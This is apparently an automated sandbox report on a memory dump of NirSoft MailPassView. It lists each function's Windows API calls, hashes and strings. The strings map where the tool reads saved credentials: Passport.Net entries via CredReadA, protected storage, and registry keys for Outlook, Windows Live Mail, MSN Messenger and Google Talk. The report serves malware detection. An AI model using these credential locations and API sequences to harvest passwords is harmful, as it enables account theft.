                                                                                                    • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                                                    • API String ID: 745651260-414181363
                                                                                                    • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                                    • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                                                    • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                                    • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040724C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004072AE
                                                                                                    • memset.MSVCRT ref: 004072C2
                                                                                                    • memset.MSVCRT ref: 004072DC
                                                                                                    • memset.MSVCRT ref: 004072F1
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                                    • strlen.MSVCRT ref: 00407364
                                                                                                    • strlen.MSVCRT ref: 00407373
                                                                                                    • memcpy.MSVCRT ref: 00407385
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                    • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                                    • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                                                    • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                                    • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403C3D, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170librarystringloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                                                    • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                                                    Strings
                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                                                    • pstorec.dll, xrefs: 00403C57
                                                                                                    • PStoreCreateInstance, xrefs: 00403C6B
                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                    • API String ID: 2884822230-961845771
                                                                                                    • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                                    • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                                                    • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                                    • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411654, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                    • String ID:
                                                                                                    • API String ID: 3662548030-0
                                                                                                    • Opcode ID: 41bf5769df4a83a18def14d6c53a8daf24d942208a748090405ecb1c565cbbc5
                                                                                                    • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                                                    • Opcode Fuzzy Hash: 41bf5769df4a83a18def14d6c53a8daf24d942208a748090405ecb1c565cbbc5
                                                                                                    • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410D1B, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00410D3C
                                                                                                      • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                                                      • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                                                      • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                      • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                                                      • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                      • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                    • memset.MSVCRT ref: 00410DAA
                                                                                                    • memset.MSVCRT ref: 00410DC5
                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                                                    • strlen.MSVCRT ref: 00410E0C
                                                                                                    • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                                                    Strings
                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                                                    • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                                                    • Store Root, xrefs: 00410DD6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                    • API String ID: 4071991895-2578778931
                                                                                                    • Opcode ID: ec9651f8696f344c0f65dd60318e7451ed8937ad8f12828f6e04c8007d0a83b3
                                                                                                    • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                                                    • Opcode Fuzzy Hash: ec9651f8696f344c0f65dd60318e7451ed8937ad8f12828f6e04c8007d0a83b3
                                                                                                    • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D5DB, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                      • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7661E520), ref: 00404654
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7661E520), ref: 004047A8
                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                    • CredReadA.SECHOST(Passport.Net\*,00000004,00000000,?,80000001,7661E520), ref: 0040D622
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                    • strlen.MSVCRT ref: 0040D6B7
                                                                                                    • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                    • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadstrcpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                                                                    • String ID: Passport.Net\*$hwA
                                                                                                    • API String ID: 199820401-2625321100
                                                                                                    • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                                    • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                                                    • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                                    • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040754D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                                                      • Part of subcall function 0040724C: GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                                      • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                                      • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                                      • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                                      • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                                                      • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                                                      • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.ADVAPI32(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                    • memset.MSVCRT ref: 0040759B
                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                    • memset.MSVCRT ref: 004075EC
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                                                    Strings
                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                    • API String ID: 2959138223-1079885057
                                                                                                    • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                                    • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                                                                    • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                                    • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A5AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 882979914-1578091866
                                                                                                    • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                                    • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                                                                    • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                                    • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EE59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,76020A60,?,00000000), ref: 0040EDBA
                                                                                                      • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                                    • memset.MSVCRT ref: 0040EEAE
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                    • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                      • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 181880968-2036018995
                                                                                                    • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                                    • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                                                    • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                                    • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040396C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                                                      • Part of subcall function 0040D5DB: CredReadA.SECHOST(Passport.Net\*,00000004,00000000,?,80000001,7661E520), ref: 0040D622
                                                                                                      • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                      • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                                                      • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                      • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                                                    Strings
                                                                                                    • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                                                    • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Openstrcpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                                                                    • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                                    • API String ID: 1587297101-1741179510
                                                                                                    • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                                    • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                                                    • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                                    • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EA72, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040EA9A
                                                                                                      • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                                                      • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                                                    • memset.MSVCRT ref: 0040EAD5
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3143880245-0
                                                                                                    • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                                    • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                                                    • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                                    • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B785, Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$DeleteIconLoadObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1986663749-0
                                                                                                    • Opcode ID: c7da4233e7b47edccd1e1069b7cecf26b08559f8f13d8112951a278846dbbb88
                                                                                                    • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                                                    • Opcode Fuzzy Hash: c7da4233e7b47edccd1e1069b7cecf26b08559f8f13d8112951a278846dbbb88
                                                                                                    • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411932, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                                    • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                                                    • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                                    • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B8D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                                                    • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_stricmpmemset
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 3575250601-3817206916
                                                                                                    • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                                    • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                                                    • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                                    • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004047A0, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                    • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7661E520), ref: 004047A8
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 145871493-0
                                                                                                    • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                                    • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                                                    • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                                    • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EB0E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 0040EB35
                                                                                                      • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                                                      • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                                                      • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4165544737-0
                                                                                                    • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                                    • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                                                    • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                                    • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004047F1, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                                    • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                                                    • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                                    • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405EE4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
